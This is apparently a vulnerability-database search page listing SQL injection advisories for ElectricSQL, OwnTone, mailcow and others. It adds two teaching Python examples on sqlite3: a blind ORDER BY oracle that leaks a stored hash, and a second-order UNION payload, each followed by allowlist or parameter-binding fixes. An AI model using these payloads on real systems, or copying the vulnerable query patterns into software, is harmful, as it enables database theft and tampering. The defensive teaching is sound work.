216329 matches found

RedhatCVE · added 2026/04/22 10:58 a.m. · 3 views

CVE-2026-40906

A flaw was found in ElectricSQL, a Postgres sync engine. An authenticated user could exploit an error-based SQL injection vulnerability in the /v1/shape API's orderby parameter. This flaw allows an attacker to read, write, and destroy the full contents of the underlying PostgreSQL database. Such ...

CVSS 9.9 · AI score 5.8 · EPSS 0.00405
Exploits: 1 · References: 5
GithubExploit · added 2026/04/22 7:05 a.m. · 107 views

Exploit for CVE-2024-46636

CVE-2024-46636 is a SQL Injection vulnerability identified in th...

AI score 6.1 · EPSS 0.00331
Exploits: 1
NVD · added 2026/04/22 4:16 a.m. · 9 views

CVE-2026-6833

The a+HRD developed by aEnrich has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVSS 7.1 · EPSS 0.00278
Exploits: 0 · References: 2
Cvelist · added 2026/04/22 3:32 a.m. · 28 views

CVE-2026-6833 aEnrich|a+HRD - SQL Injection

The a+HRD developed by aEnrich has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVSS 7.1 · EPSS 0.00278
Exploits: 0 · References: 2
Vulnrichment · added 2026/04/22 3:32 a.m. · 3 views

CVE-2026-6833 aEnrich|a+HRD - SQL Injection

The a+HRD developed by aEnrich has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVSS 7.1 · AI score 6 · EPSS 0.00278
Exploits: 0 · References: 2
CVE · added 2026/04/22 3:32 a.m. · 23 views

CVE-2026-6833

CVE-2026-6833 concerns the a+HRD product developed by aEnrich, described across multiple sources as a SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands and read database contents. Official metrics indicate CVSS v3.1 base...

CVSS 7.1 · AI score 6 · EPSS 0.00278
Exploits: 0 · References: 2
Vulnrichment · added 2026/04/22 1:46 a.m. · 1 view

CVE-2026-41457 OwnTone Server < 29.1 SQL Injection via query and filter Parameters

OwnTone Server versions 28.4 through 29.0 contain a SQL injection vulnerability in DAAP query and filter handling that allows attackers to inject arbitrary SQL expressions by supplying malicious values through the query= and filter= parameters for integer-mapped DAAP fields. Attackers can exploit...

CVSS 6.9 · AI score 5.9 · EPSS 0.00274
Exploits: 0 · References: 2
CVE · added 2026/04/22 1:46 a.m. · 9 views

CVE-2026-41457

OwnTone Server (versions 28.4–29.0) contains a SQL injection in DAAP query and filter handling. Malicious values in query= and filter= for integer-mapped DAAP fields bypass filters and may grant unauthorized access to media library data due to insufficient input sanitization. Connected records in...

CVSS 6.9 · AI score 5.9 · EPSS 0.00274
Exploits: 0 · References: 2
ATTACKERKB · added 2026/04/22 1:46 a.m. · 2 views

CVE-2026-41457

OwnTone Server versions 28.4 through 29.0 contain a SQL injection vulnerability in DAAP query and filter handling that allows attackers to inject arbitrary SQL expressions by supplying malicious values through the query= and filter= parameters for integer-mapped DAAP fields. Attackers can exploit...

CVSS 6.9 · AI score 5.9 · EPSS 0.00274
Exploits: 0 · References: 3 · Affected Software: 1
Cvelist · added 2026/04/22 1:46 a.m. · 27 views

CVE-2026-41457 OwnTone Server < 29.1 SQL Injection via query and filter Parameters

OwnTone Server versions 28.4 through 29.0 contain a SQL injection vulnerability in DAAP query and filter handling that allows attackers to inject arbitrary SQL expressions by supplying malicious values through the query= and filter= parameters for integer-mapped DAAP fields. Attackers can exploit...

CVSS 6.9 · EPSS 0.00274
Exploits: 0 · References: 2
RedhatCVE · added 2026/04/22 1:22 a.m. · 7 views

CVE-2026-39486

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Chill Download Monitor (download-monitor) allows Blind SQL Injection. This issue affects Download Monitor: from n/a through 5.1.8...

CVSS 8.5 · AI score 5.8 · EPSS 0.00256
Exploits: 0 · References: 1
Positive Technologies · added 2026/04/22 12:00 a.m. · 5 views

PT-2026-34606

Affected software and versions: Daptin versions prior to 0.11.4. Description: The '/aggregate/:typename' endpoint accepts column and group query parameters that are passed without validation to goqu.L, a raw SQL literal expression builder. This bypasses parameterization,...

CVSS 8.3 · AI score 6 · EPSS 0.00345
Exploits: 0 · References: 4
CNNVD · added 2026/04/22 12:00 a.m. · 9 views

OwnTone SQL injection vulnerability

OwnTone is an open-source Linux/FreeBSD DAAP (iTunes), MPD (Music Player Daemon), and RSP (Roku) media server. Versions 28.4 to 29.0 of OwnTone have a SQL injection vulnerability. The vulnerability stems from insufficient sanitization of the query= and filter= parameters during DAAP query and filter...

CVSS 6.9 · AI score 5.9 · EPSS 0.00274
Exploits: 0 · References: 1
Positive Technologies · added 2026/04/22 12:00 a.m. · 7 views

PT-2026-34610

Affected software and versions: @nocobase/plugin-collection-sql versions prior to 2.0.39. Description: An issue exists where the checkSQL validation function, designed to block dangerous SQL keywords such as pg_read_file, LOAD_FILE, and dblink, is not applied to the...

CVSS 7.2 · AI score 5.8 · EPSS 0.01833
Exploits: 1 · References: 9
Packet Storm · added 2026/04/22 12:00 a.m. · 73 views

esiclivre 0.2.2 SQL Injection

The password reset functionality in esiclivre is affected by multiple vulnerabilities. The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling. Additionally, the endpoint lacks CSRF protection, input validation, and rate limiting, enabling attackers to perform us...

AI score 5.8
Exploits: 0
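Two patterns recur in the entries above. The ElectricSQL (orderby) and Daptin (column/group) listings put request values in an identifier position of the statement, where a bound parameter is not an option, and the esiclivre listing is a blind injection, where the attacker gets back no data or error text, only a difference in behaviour. The following added example (written for this page; not code from ElectricSQL, Daptin, esiclivre or any other project listed here; the items/users schema, the data, and every function name are hypothetical) shows both on an in-memory sqlite3 database: why "ORDER BY ?" cannot be the fix, how the order of an otherwise legitimate result set becomes a one-bit oracle that leaks a stored value character by character, and the allowlist that closes the hole.

```python
"""Added example, not code from any project on this page.
Schema, data and names are hypothetical; the 'password_hash' value is made up.
"""
import sqlite3
import string

SECRET_ALPHABET = string.ascii_lowercase + string.digits + "-"


def make_db() -> sqlite3.Connection:
    """Constructed data: a public items table and a users table that the
    listing API is never supposed to touch."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        INSERT INTO items (id, name) VALUES (1, 'pear'), (2, 'apple'), (3, 'fig');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'zebra-9f2c');
        """
    )
    return conn


def list_items_vulnerable(conn: sqlite3.Connection, orderby: str) -> list[str]:
    """VULNERABLE: the request value lands in the statement text.
    'ORDER BY ?' with a bound parameter would not help: a bound value is a
    constant, and sorting by a constant changes nothing."""
    rows = conn.execute(f"SELECT name FROM items ORDER BY {orderby}").fetchall()
    return [name for (name,) in rows]


# --- attacker side: row order as a boolean oracle ---------------------------
BY_ID = ["pear", "apple", "fig"]    # what ORDER BY id returns
BY_NAME = ["apple", "fig", "pear"]  # what ORDER BY name returns


def order_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """True when `condition` holds inside the database: the injected sort key
    is `id` if it does and `name` if it does not, so the answer is visible in
    nothing but the order of a normal-looking response."""
    injected = f"CASE WHEN ({condition}) THEN id ELSE name END"
    return list_items_vulnerable(conn, injected) == BY_ID


def leak_secret(conn: sqlite3.Connection, max_len: int = 32) -> str:
    """Recover users.password_hash one character per position via the oracle."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in SECRET_ALPHABET:
            probe = f"substr((SELECT password_hash FROM users LIMIT 1), {pos}, 1) = '{ch}'"
            if order_oracle(conn, probe):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of value
    return recovered


# --- hardened: map the request value through an allowlist -------------------
SORT_COLUMNS = {"id": "id", "name": "name"}  # request key -> real column


def list_items_safe(conn: sqlite3.Connection, orderby: str) -> list[str]:
    """Accepts 'name', 'name desc', 'id asc'; everything else is rejected
    before it gets near the SQL text."""
    parts = orderby.strip().lower().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("orderby must be '<column> [asc|desc]'")
    column = SORT_COLUMNS.get(parts[0])
    if column is None:
        raise ValueError(f"unknown sort column {parts[0]!r}")
    direction = "ASC"
    if len(parts) == 2:
        if parts[1] not in ("asc", "desc"):
            raise ValueError("direction must be asc or desc")
        direction = parts[1].upper()
    # Only allowlisted identifiers and the two fixed keywords reach the query.
    sql = f'SELECT name FROM items ORDER BY "{column}" {direction}'
    return [name for (name,) in conn.execute(sql).fetchall()]


def safe_rejects(conn: sqlite3.Connection, orderby: str) -> bool:
    """True if the hardened endpoint refuses `orderby`."""
    try:
        list_items_safe(conn, orderby)
    except ValueError:
        return True
    return False


def demo() -> dict:
    conn = make_db()
    payload = "CASE WHEN (1=1) THEN id ELSE name END"
    return {
        "benign": list_items_vulnerable(conn, "name"),
        "leaked": leak_secret(conn),
        "safe_desc": list_items_safe(conn, "name desc"),
        "safe_rejects_payload": safe_rejects(conn, payload),
    }
```

Run `demo()`: the vulnerable endpoint answers the benign request correctly and at the same time lets `leak_secret` pull the whole hash out through the sort order alone, which is what makes an ORDER BY sink as serious as a WHERE sink even when nothing is echoed. The allowlist version serves the same legitimate requests and raises on the payload; the quoted identifier comes from the server-side map, never from the request.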
Positive Technologies · added 2026/04/22 12:00 a.m. · 4 views

PT-2026-37159

Affected software and versions: pgx versions prior to 5.9.2. Description: SQL injection can occur when the non-default simple protocol is used in conjunction with a dollar-quoted string literal in the SQL query. If that string literal contains text that would be interpreted as...

CVSS 9.8 · AI score 5.8 · EPSS 0.00559
Exploits: 0 · References: 136
NVD · added 2026/04/21 9:16 p.m. · 3 views

CVE-2026-40906

Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the orderby parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL injection, allowing any authenticated user to read, write, and destroy the full contents of the underlying PostgreSQL database through crafted...

CVSS 9.9 · EPSS 0.00405
Exploits: 1 · References: 2
NVD · added 2026/04/21 9:16 p.m. · 1 view

CVE-2025-70420

Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none...

EPSS 0.00039
Exploits: 0
NVD · added 2026/04/21 8:17 p.m. · 5 views

CVE-2026-40887

Vendure is an open-source headless commerce platform. Starting in version 1.7.4 and prior to versions 2.3.4, 3.5.7, and 3.6.2, an unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query string parameter is interpolated directly into a raw SQL expression...

CVSS 9.1 · EPSS 0.01762
Exploits: 0 · References: 1
NVD · added 2026/04/21 8:17 p.m. · 2 views

CVE-2026-40871

mailcow: dockerized is an open-source groupware/email suite based on Docker. Versions prior to 2026-03b have a second-order SQL injection vulnerability in the quarantinecategory field via the Mailcow API. The /api/v1/add/mailbox endpoint stores quarantinecategory without validation or sanitizatio...

CVSS 7.2 · EPSS 0.09874
Exploits: 0 · References: 1
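The mailcow entry above is a second-order injection: the write is itself parameterized and looks correct, the payload sits harmlessly in a column, and the injection fires later in a different code path that trusts the stored value and concatenates it into SQL. The following added example (not mailcow's code; the mailbox/quarantine/users schema and field names are hypothetical, loosely modelled on the listing, and the data is constructed) reproduces the pattern on sqlite3 and shows the two fixes: bind the value wherever it is used, and validate an enumerated field at the API boundary so the payload is never stored.

```python
"""Added example, not code from mailcow or any project on this page.
Schema, data and names are hypothetical; the 'password_hash' value is made up.
"""
import sqlite3

PAYLOAD = "x' UNION SELECT username, password_hash FROM users --"
ALLOWED_CATEGORIES = {"reject", "add_header", "all"}


def make_db() -> sqlite3.Connection:
    """Constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE mailbox (name TEXT PRIMARY KEY, quarantine_category TEXT);
        CREATE TABLE quarantine (sender TEXT, category TEXT, subject TEXT);
        INSERT INTO quarantine VALUES ('spam@example.invalid', 'reject', 'Buy now');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'zebra-9f2c');
        """
    )
    return conn


def add_mailbox(conn: sqlite3.Connection, name: str, category: str) -> None:
    """First order: parameterized, so this statement is not injectable.
    It stores the attacker's string verbatim, which is the whole problem."""
    conn.execute(
        "INSERT INTO mailbox (name, quarantine_category) VALUES (?, ?)",
        (name, category),
    )


def stored_category(conn: sqlite3.Connection, name: str) -> str:
    row = conn.execute(
        "SELECT quarantine_category FROM mailbox WHERE name = ?", (name,)
    ).fetchone()
    return row[0]


def quarantine_report_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Second order: the category came out of our own database, so it is
    treated as trusted and spliced into the query text.  VULNERABLE."""
    category = stored_category(conn, name)
    sql = f"SELECT sender, subject FROM quarantine WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def quarantine_report_safe(conn: sqlite3.Connection, name: str) -> list:
    """Fix 1: bind the value at the point of use, whatever its origin."""
    category = stored_category(conn, name)
    return conn.execute(
        "SELECT sender, subject FROM quarantine WHERE category = ?", (category,)
    ).fetchall()


def add_mailbox_safe(conn: sqlite3.Connection, name: str, category: str) -> None:
    """Fix 2 (defence in depth): an enumerated field is validated at the API
    boundary, so a payload never reaches storage in the first place."""
    if category not in ALLOWED_CATEGORIES:
        raise ValueError(f"invalid quarantine category {category!r}")
    add_mailbox(conn, name, category)


def demo() -> dict:
    conn = make_db()
    add_mailbox(conn, "victim@example.invalid", "reject")
    add_mailbox(conn, "attacker@example.invalid", PAYLOAD)  # accepted silently
    try:
        add_mailbox_safe(conn, "attacker2@example.invalid", PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "victim_report": quarantine_report_vulnerable(conn, "victim@example.invalid"),
        "attacker_report_vulnerable": quarantine_report_vulnerable(conn, "attacker@example.invalid"),
        "attacker_report_safe": quarantine_report_safe(conn, "attacker@example.invalid"),
        "payload_rejected_at_boundary": rejected,
    }
```

The vulnerable report works correctly for the victim and returns the users table for the attacker, because the stored string closes the literal, appends a UNION, and comments out the trailing quote. Grepping only the endpoint that accepts input misses this class; the review question is whether any value read back from the database is ever interpolated, not where it was written.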